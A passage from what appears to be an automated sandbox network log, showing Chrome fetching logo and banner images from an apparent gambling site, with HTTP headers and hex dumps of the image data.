                                                      2025-01-12 23:47:58 UTC4096INData Raw: a5 d6 9a ae 93 29 ca 45 0c 6a 2e 6e d3 6f 26 8d df fd 38 31 46 2a fa 49 29 97 4c 12 e2 36 9d 99 5d a6 b6 ed b2 b5 1d 64 25 b9 4b 29 15 98 bc 86 8a 4f 94 d1 79 0a dd 63 1c 20 bf e6 f1 7f 56 b1 58 eb cd 43 4a 70 53 54 22 e7 4a 94 45 d8 1a 72 f9 70 5d 60 22 eb c5 92 46 33 03 20 79 1e d1 91 93 0f 85 a4 62 ca 69 e0 8b 2e 53 bd f7 ff 00 fe d3 0d 86 ad 83 3e ca a9 8b 59 cc b5 d3 1c 65 1c aa 81 29 46 67 b7 f9 6f 94 e6 dc 4c db 7d 00 72 27 1e 10 f1 69 0a 99 16 ee ea 40 6e 35 f3 41 04 36 b9 37 27 81 fe 77 1e c3 6c 28 9c 38 ca 2b c6 f1 a9 ef 21 18 ce 23 c7 1d e7 ef 42 8c 68 c6 02 0f 77 8f 6a 1b d4 d9 d0 e3 fe c0 9c 24 f0 de b6 f7 c8 ca 80 ca 22 70 9a 27 9e 2d e2 9d e3 69 19 62 ce 44 e8 3b 4e 4a c8 ac 0c 85 49 b8 d2 29 db a1 96 81 95 6b fb 91 c8 3a bd 38 94 c4 a6 6e
                                                      Data Ascii: )Ej.no&81F*I)L6]d%K)Oyc VXCJpST"JErp]`"F3 ybi.S>Ye)FgoL}r'i@n5A67'wl(8+!#Bhwj$"p'-ibD;NJI)k:8n
                                                      2025-01-12 23:47:58 UTC4096INData Raw: 58 45 15 22 f3 a7 19 b6 63 4a 53 ab 4a 6c 54 c7 02 89 09 d6 8a 49 c8 de 4b b5 79 88 d5 2e 88 cc a6 ae 33 6a 46 52 66 08 98 94 4d 4c e2 63 f1 4c 5d bd 26 89 b5 d6 67 da 5e 58 6b 37 1f 6a ca 04 50 0b 9c 4e 4a 15 78 bc e0 dc 0a 32 2b 42 ab 2a 37 9b c8 d8 27 93 2f c9 f6 89 9c 31 ff 00 de 07 1f be 2c 1d 12 06 12 06 13 bf d9 e5 1f e3 78 d2 f7 90 8c 67 08 1f eb 90 f1 f7 a5 42 3b 9c 05 b9 0d e7 db 91 b6 26 3d 4f 52 12 4e 38 9e be bf 04 2f 88 78 29 09 0c aa ca e9 6f b8 02 59 11 4c 4d 72 09 ab 18 a6 79 81 5a 75 f2 52 c4 ba 4f 7f c8 a7 81 5d 49 25 29 54 3a 9d cd a5 97 19 f3 d8 b8 48 66 38 cd ea 46 ee b8 57 bd 1b 1d cb ad 9a 7d 1a c7 40 3a ea 7e 19 25 31 41 aa 65 68 ab ab 95 59 d2 69 75 61 44 53 03 1a 12 61 45 18 3f 2c 01 1a 02 8a 2c 1f 1d 4b 4a f6 99 23 39 5f aa fa
                                                      Data Ascii: XE"cJSJlTIKy.3jFRfMLcL]&g^Xk7jPNJx2+B*7'/1,xgB;&=ORN8/x)oYLMryZuRO]I%)T:Hf8FW}@:~%1AehYiuaDSaE?,,KJ#9_
                                                      2025-01-12 23:47:58 UTC4096INData Raw: f0 8c 4f 4f a1 52 b9 b5 29 6d a5 4b 2a ea 55 15 8b 14 f5 16 9a 58 06 1a 44 c6 dd 1f 90 87 f2 56 0d 13 1f f8 d9 18 43 6e 87 4f e1 25 66 36 ef 68 0d 25 e7 db 14 58 22 13 d3 32 e0 85 d9 57 e1 22 02 d3 f4 b6 16 22 46 12 93 05 af d5 d2 66 5f 63 0b 45 96 e0 4a 36 cb 64 e9 0e ad ac 4d 7f ea 18 cb a0 30 65 a8 21 fe 53 07 05 9e 7c 18 59 65 a6 33 02 52 89 b3 47 5a 9b 2c b2 15 f2 98 4b 68 45 16 fd 16 9d 07 64 37 e9 5c 1a cf 0f 0a d7 52 6b b7 a9 60 65 a7 76 26 2e c1 9b 96 29 96 c9 e1 bf 11 7f 25 a5 59 b6 df 3a 24 31 25 a5 49 80 0c 2a 09 04 56 86 92 a2 d0 b3 46 fc 05 d3 2e fb 09 a5 42 ed 3a d8 b2 2d 55 8f 83 4c 22 54 54 e9 f5 52 df 09 59 d5 25 ff 00 25 71 3a 1a d3 39 06 ca 74 f5 08 e0 eb 0a 92 ca 96 c0 2b 77 48 2d 20 b4 7e 4a 6d a6 2e 8d 46 ce 92 96 6e ae c1 f9 4a c3
                                                      Data Ascii: OOR)mK*UXDVCnO%f6h%X"2W""Ff_cEJ6dM0e!S|Ye3RGZ,KhEd7\Rk`ev&.)%Y:$1%I*VF.B:-UL"TTRY%%q:9t+wH- ~Jm.FnJ
                                                      2025-01-12 23:47:58 UTC4096INData Raw: 1b e4 5f d9 8c b8 f3 a5 aa 40 92 1d 9e bf d4 df 87 68 05 49 4b 8e 62 2a 8b c1 57 e0 f6 61 7a 93 07 66 56 3f d2 a7 8f f5 7a bf d0 fe bc 23 b5 37 8b 6a 55 f3 cd c3 63 c7 ac 23 06 ea f5 b8 b1 bc aa aa e9 14 5d 53 5e 52 8e 11 27 16 4e eb 44 ec 98 cd 83 17 2e 39 48 aa ae 25 24 16 84 4a 82 1b 88 b1 c1 11 a6 9a b7 a2 e0 56 04 95 eb 38 5a a9 9e 4e f9 97 ce ff 00 82 0f 60 ac fd f1 dd 2e f3 d3 8f b6 e2 ed 4a 8f 5e 7c 68 cd c9 e6 29 56 5f 3a da 69 f5 51 78 4a 1a b0 ca 68 e9 73 d7 50 eb 8a c7 2f e9 22 f4 bd 9a f5 54 27 97 29 14 4a 27 15 b7 35 e2 2a 01 98 53 84 73 08 d5 9c 4e 16 92 a0 03 79 85 aa 03 e7 45 ee ec 29 0b e9 40 38 62 5c a2 9a 54 cc b9 48 b5 c2 25 f8 40 8b ca 69 e3 ba 99 79 72 32 32 85 b4 f9 6c 88 d6 3d 29 52 5b 78 80 45 94 e1 15 d6 b6 58 f7 65 21 21 b3 36
                                                      Data Ascii: _@hIKb*WazfV?z#7jUc#]S^R'ND.9H%$JV8ZN`.J^|h)V_:iQxJhsP/"T')J'5*SsNyE)@8b\TH%@iyr22l=)R[xEXe!!6
                                                      2025-01-12 23:47:58 UTC4096INData Raw: bd f1 f5 50 9c a6 9a d5 65 5c e4 c8 bf 4b 5c 18 af 2c 78 02 55 9a 72 7b 29 66 75 b9 97 e4 24 72 34 de 9c ea 35 f5 1d 83 83 3d f5 2b b1 c2 27 79 4a ef 71 68 d4 ee cd 68 59 67 21 00 1d d7 72 72 1a 13 3b c2 87 9b 16 64 05 54 f6 44 35 4d 79 a6 47 8e 92 66 0a 89 e4 fe 55 65 3b 4e 66 9b c8 af 23 a8 b1 8e cf 06 7b ea 57 63 84 56 fa 95 de e1 99 bf 4b aa c7 82 e9 9a 8a b2 90 61 ab 2f a5 0e 5c 7a 60 f2 30 f2 a3 2a ee 7d 92 8f 47 cb 8f 05 b3 0f 0c 2a 32 fa b8 71 da cc 06 e5 21 da cc 02 e0 d3 79 4a 6c f8 a2 57 fc d2 d2 59 a7 a4 8c 17 68 18 da b3 a3 6b d4 13 86 81 af 23 01 9c 51 c1 74 4e b1 d9 05 e5 88 ef a4 bb 42 60 d0 0c d3 cf c8 15 43 92 c8 0a ba a0 1f b2 63 b5 3b 2e e8 86 4a bc 05 d5 8f f2 45 51 0f 9b b3 0f 77 56 64 a1 b9 6a 54 ad 27 ff 00 11 a2 12 4c 1b 4d 80 7b
                                                      Data Ascii: Pe\K\,xUr{)fu$r45=+'yJqhhYg!rr;dTD5MyGfUe;Nf#{WcVKa/\z`0*}G*2q!yJlWYhk#QtNB`Cc;.JEQwVdjT'LM{
                                                      2025-01-12 23:47:58 UTC4096INData Raw: a5 ca cd 57 80 30 b9 af 52 b4 d8 3f b0 35 0f 4f 4c a6 41 cc e5 0a ed a3 3d 4e 7b 5a 8b 14 7a eb a3 c5 d7 47 8b ae 8f 16 9d da cf 70 94 7e ec b0 b7 57 b5 4b 73 a5 6c 89 04 6b d1 4e 47 53 65 78 b6 5e bd 4c ed 6b 4c 7b 61 7d 19 fc f6 71 53 c4 7b 87 1e 36 ac e3 a4 e4 80 32 97 e5 d9 a4 68 a7 8c f0 f7 63 65 5f 32 cd fa 58 69 e0 4c 03 77 0f 0b 0f 65 2a d3 8e f3 e1 a9 3f 84 35 a6 3d 97 d0 31 e2 65 49 ae 04 42 dd 36 7e 05 90 37 50 ed 30 b8 9b 67 17 d0 71 53 20 de 0c dc 51 a3 1e ed 7a 2c 5d 94 ab 4d 7b d1 7c 35 27 f0 9b 2d 2e ec be 1a 7f 5d c2 d3 65 13 02 84 f9 9a 18 b1 d0 1c 55 d5 49 1f 4e 27 bb db 70 69 98 7f 10 d9 34 e3 ff 00 b3 17 7a 65 02 6d d8 a1 bc ba 29 bb 2e 11 a0 f2 b2 ea 3e 9d b2 8c 65 ce e1 55 9b b2 95 69 87 72 c7 e8 be 62 17 8b 50 a0 c0 10 6e a6 a1 c7
                                                      Data Ascii: W0R?5OLA=N{ZzGp~WKslkNGSex^LkL{a}qS{62hce_2XiLwe*?5=1eIB6~7P0gqS Qz,]M{|5'-.]eUIN'pi4zem).>eUirbPn
                                                      2025-01-12 23:47:58 UTC1700INData Raw: af dc 82 9a fd c8 26 bb 13 53 58 e0 cf 53 0d bf 81 4c 36 fe 05 30 db f8 13 50 40 0c 87 e3 2f c9 8d d3 8c 3b f6 d5 83 b7 c7 89 bf d1 72 07 6a 6a 47 5d 4d 81 d7 6f fb 53 6c fe e6 45 35 0f d4 d4 4e e1 73 32 e4 e3 e8 dc a2 fe 21 ce 9d d0 a2 f8 6f d3 63 e7 5c 9a d1 84 da a5 75 c9 8d 6b a9 b6 06 70 cd b0 fe 85 c8 ee bd dc 35 c8 e6 1d c5 36 c2 4e 0e c0 1f c6 b9 31 a5 c9 82 33 63 4e 47 34 3a 6e 06 e6 2f dd 1f 8d 3a d4 01 1d 88 ee 18 5c 53 fc 0b 30 7b e7 03 71 72 a7 df bd c0 a7 f8 66 60 be e1 d7 a9 7d 3a d4 07 a7 c1 4d 48 32 2e 67 9a 6a 00 c2 85 7b f9 e9 b8 c0 23 a9 7e c2 a9 39 0d 70 e3 05 63 20 e8 be 9a 33 8c 23 a8 a6 ce ec 71 ac b3 0d c3 5f dc f8 d7 bd 3d f5 70 f6 0e a6 e6 26 ff 00 47 dc 9e f8 29 3a 8e 9a 87 22 a8 61 6c 3c 7d 0b 94 5e 0c 55 be 8d c0 a2 f8 6f d3
                                                      Data Ascii: &SXSL60P@/;rjjG]MoSlE5Ns2!oc\ukp56N13cNG4:n/:\S0{qrf`}:MH2.gj{#~9pc 3#q_=p&G):"al<}^Uo


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      103192.168.2.44985520.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:57 UTC621OUTGET /images_plus/footer/footer-logo.png?ver=1606790107 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:57 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:57 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 690
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:07 GMT
                                                      ETag: "5fc5abdb-2b2"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:57 UTC690INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 13 08 03 00 00 00 30 03 7a 5d 00 00 00 54 50 4c 54 45 99 99 99 00 00 00 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 84 70 40 b9 00 00 00 1c 74 52 4e 53 e6 00 4a 3e 26 16 0b b9 62 b1 73 97 dd ca 6b 55 d1 d8 ab 1d 85 31 37 c3 a1 a6 7b 8d d2 fa a8 15 00 00 01 f1 49 44 41 54 38 cb 8d 93 db b2 a5 20 0c 44 09 10 44 41 50 b7 77 ff ff 3f 07 48 54 4e 9d 9a d9 d3 2f d8 5c 56 25 0d 8a a2 06 fe 29 03 ff af ef 40 1d 5a 9d 98 f2 dc a7 69 3a 4e 05 ac f5 3c da 76 3a e6 34 11 bb 5b 01 bf 00 3f 5d 93 96 75 c2 8a 5b 19
                                                      Data Ascii: PNGIHDRP0z]TPLTEp@tRNSJ>&bskU17{IDAT8 DDAPw?HTN/\V%)@Zi:N<v:4[?]u[


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      104192.168.2.44985620.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:57 UTC619OUTGET /images_plus/footer/footer-gt.png?ver=1606790107 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:58 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:58 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 360
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:07 GMT
                                                      ETag: "5fc5abdb-168"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:58 UTC360INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 20 08 03 00 00 00 a2 8d 41 82 00 00 00 39 50 4c 54 45 9a 9a 9a 00 00 00 9a 9a 9a 80 82 85 9a 9a 9a 94 94 95 80 82 85 9a 9a 9a 9a 9a 9a 97 97 98 9a 9a 9a 96 97 97 9a 9a 9a 9a 9a 9a 9a 9a 9a 9a 9a 9a 95 96 96 9a 9a 9a 80 82 85 6a 0a 30 0c 00 00 00 13 74 52 4e 53 e6 00 3a e6 73 e6 3a 26 d8 83 4e 0e ca ad 9f 65 bf 90 a6 b6 e7 da b6 00 00 00 cb 49 44 41 54 38 cb dd 94 dd 0e 83 20 0c 46 69 ed 04 8a 20 fa fe 0f 3b 19 9d e2 4f a3 17 bb da b9 2a c9 81 7c 6d 1a 0c 3c 41 b3 c8 08 f8 27 16 53 8a c4 3b 8b 8f 96 1d ea 79 b0 64 ae 59 2c 74 46 70 49 b5 82 48 82 62 8d e6 89 15 6b 91 71 4d f5 ca 9e 71 bd 3c 22 22 7c 23 85 ad fb 57 d7 75 3d ee 7b ac c4 52 87 3b 8b a0 f0 1b 2b 97 da ea 56 de 0e 93 6e 79 69
                                                      Data Ascii: PNGIHDR% A9PLTEj0tRNS:s:&NeIDAT8 Fi ;O*|m<A'S;ydY,tFpIHbkqMq<""|#Wu={R;+Vnyi


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      105192.168.2.44985720.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:58 UTC623OUTGET /images_plus/footer/footer-Thwate.png?ver=1606790107 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:58 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:58 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 848
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:07 GMT
                                                      ETag: "5fc5abdb-350"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:58 UTC848INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 7b 00 00 00 20 04 03 00 00 00 c0 a0 1a 78 00 00 00 27 50 4c 54 45 99 99 99 41 41 41 36 36 36 86 86 86 7c 7c 7c 2b 2b 2b 69 69 69 92 92 92 4d 4d 4d 5e 5e 5e 57 57 57 75 75 75 47 70 4c 93 4d d8 44 00 00 00 0d 74 52 4e 53 ff ff ff ff ff ff ff ff ff ff ff ff 00 3d e8 22 86 00 00 02 cb 49 44 41 54 38 cb a5 55 bf 6b 13 71 14 ff b4 97 e6 6a 9b 21 89 56 44 6e 48 15 5a 90 0c a1 b4 22 35 43 90 d0 a2 74 68 2d e8 92 21 84 8a 14 1c 42 69 5d 74 88 82 53 33 44 07 71 c8 a0 c5 41 a1 c3 e1 26 64 b8 bb a4 31 89 df 3f ca cf 7b 97 c4 82 14 ea e5 e0 ee be df bb fb bc 1f 9f cf 7b ef 60 26 39 3c e8 ed 4e 01 38 3c 89 0a bf 06 3d 2a d1 e0 4f 30 3c 9a 51 e0 67 39 22 63 7a 29 45 80 ef 02 d6 5b e6 4f 03 6b 11 e0 39 58 75 59 f7
                                                      Data Ascii: PNGIHDR{ x'PLTEAAA666|||+++iiiMMM^^^WWWuuuGpLMDtRNS="IDAT8Ukqj!VDnHZ"5Cth-!Bi]tS3DqA&d1?{{`&9<N8<=*O0<Qg9"cz)E[Ok9XuY


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      106192.168.2.44985820.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:58 UTC624OUTGET /images_plus/footer/footer-GamCare.png?ver=1606790107 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:58 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:58 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 420
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:07 GMT
                                                      ETag: "5fc5abdb-1a4"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:58 UTC420INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1a 00 00 00 1d 04 03 00 00 00 46 61 61 45 00 00 00 2d 50 4c 54 45 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 47 70 4c d7 71 e1 b0 00 00 00 0f 74 52 4e 53 af 05 e6 41 74 d2 93 15 a1 31 85 5a 22 bd 00 df c6 da 56 00 00 01 17 49 44 41 54 18 d3 63 a8 52 02 01 43 b9 77 20 c0 b0 08 c2 13 14 04 f3 98 60 3c 41 39 18 4f 35 c5 c5 12 c4 05 f1 54 17 0b 02 45 c2 0c 05 41 3c 55 c3 ea dc 14 97 56 25 85 42 39 20 6f 61 49 10 48 9f 85 d2 44 20 4f 45 f2 12 c4 14 71 90 ca c6 52 88 7d 10 53 0e 3a 41 6d 7f 08 b4 21 56 90 09 c9 2d 0a 50 9e 20 08 30 e8 0a 36 41 dd 02 e2 29 1d 34 02 cb 39 30 30 30 24 33 28 35 8a 80 78 92 60 e7 32 28 a9 08 6e
                                                      Data Ascii: PNGIHDRFaaE-PLTEGpLqtRNSAt1Z"VIDATcRCw `<A9O5TEA<UV%B9 oaIHD OEqR}S:Am!V-P 06A)49000$3(5x`2(n


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      107192.168.2.44985920.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:58 UTC626OUTGET /images_plus/footer/footer-gibraltar.png?ver=1606790107 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:58 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:58 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 616
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:07 GMT
                                                      ETag: "5fc5abdb-268"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:58 UTC616INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1e 00 00 00 20 08 03 00 00 00 32 9e 38 4d 00 00 00 42 50 4c 54 45 00 00 00 5f 5f 5f 89 89 89 6a 6a 6a 58 58 58 6f 6f 6f 74 74 74 78 78 78 43 43 43 7c 7c 7c 82 82 82 66 66 66 4b 4b 4b 52 52 52 39 39 39 9a 9a 9a 94 94 94 30 30 30 a7 a7 a7 8f 8f 8f a0 a0 a0 1d 1d 1d bb f4 d5 b7 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 01 d4 49 44 41 54 28 cf 75 93 57 92 24 21 0c 44 4b de e0 cb dc ff aa 5b 35 b3 13 dd b3 1b 9d 1f 04 e2 85 52 80 60 7b 57 05 05 df 3e a9 cd e3 08 6c 9f 70 a0 98 6a f9 1f 54 ac f7 38 6a 3b 05 78 db 80 ff c1 b3 48 a5 03 7b 54 73 68 82 bf b9 15 e6 89 3b 5e 7c f1 9e b9 99 94 f7 2d 68 b3 8e 72 8e cb 17 ee 16 8d 98 cd 5f d8 5b ad 1e 03 b5 d2 09 09 10 fb 4e f2 c2 20 0d 78 12 83 b6 e6 7a b0 e8
                                                      Data Ascii: PNGIHDR 28MBPLTE___jjjXXXoootttxxxCCC|||fffKKKRRR999000tRNS@fIDAT(uW$!DK[5R`{W>lpjT8j;xH{Tsh;^|-hr_[N xz


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      108192.168.2.44986120.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:58 UTC386OUTGET /images_plus/other/banner1.jpg?ver=1606891697 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:58 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:58 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 62478
                                                      Connection: close
                                                      Last-Modified: Wed, 02 Dec 2020 06:48:17 GMT
                                                      ETag: "5fc738b1-f40e"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:58 UTC3739INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 bc 00 00 00 ff 08 03 00 00 00 24 37 f5 9a 00 00 03 00 50 4c 54 45 01 00 00 0b 24 19 06 03 03 ff ff ff f0 f0 f0 13 28 1e 08 06 04 2f 89 69 0e 29 1d 07 09 08 0e 17 13 0c 13 10 04 05 05 0f 1a 16 0b 0a 05 f6 f7 f7 ed ed ed 13 24 1d 0a 10 0d 10 1e 18 12 21 1b 14 2d 22 09 0d 0a ff f7 01 13 29 22 0f 0c 06 ff fe 09 0d 02 01 e8 e8 e8 1d 3e 27 16 12 0f 17 33 23 15 03 02 14 0f 06 1d 07 04 0f 13 09 11 32 1f 26 0a 05 19 38 24 22 45 29 15 22 11 2f 0d 06 19 2a 15 1a 14 07 20 19 0b 1b 19 15 3a 11 07 29 1f 0d 7f 8c 80 27 4e 29 12 1b 0d 1d 35 1a 42 1b 0e 39 3c 3d 3b 33 13 2d 37 34 8c 9a 91 1d 26 26 24 30 2d 43 3a 1d 24 20 1c 2b 57 2c e2 e2 e2 0f 32 2a 43 50 47 31 28 0e 15 1b 20 2f 61 30 35 30 2c 2a 28 25 c5 c8 c6 39
                                                      Data Ascii: PNGIHDR$7PLTE$(/i)$!-")">'3#2&8$"E)"/* :)'N)5B9<=;3-74&&$0-C:$ +W,2*CPG1( /a050,*(%9
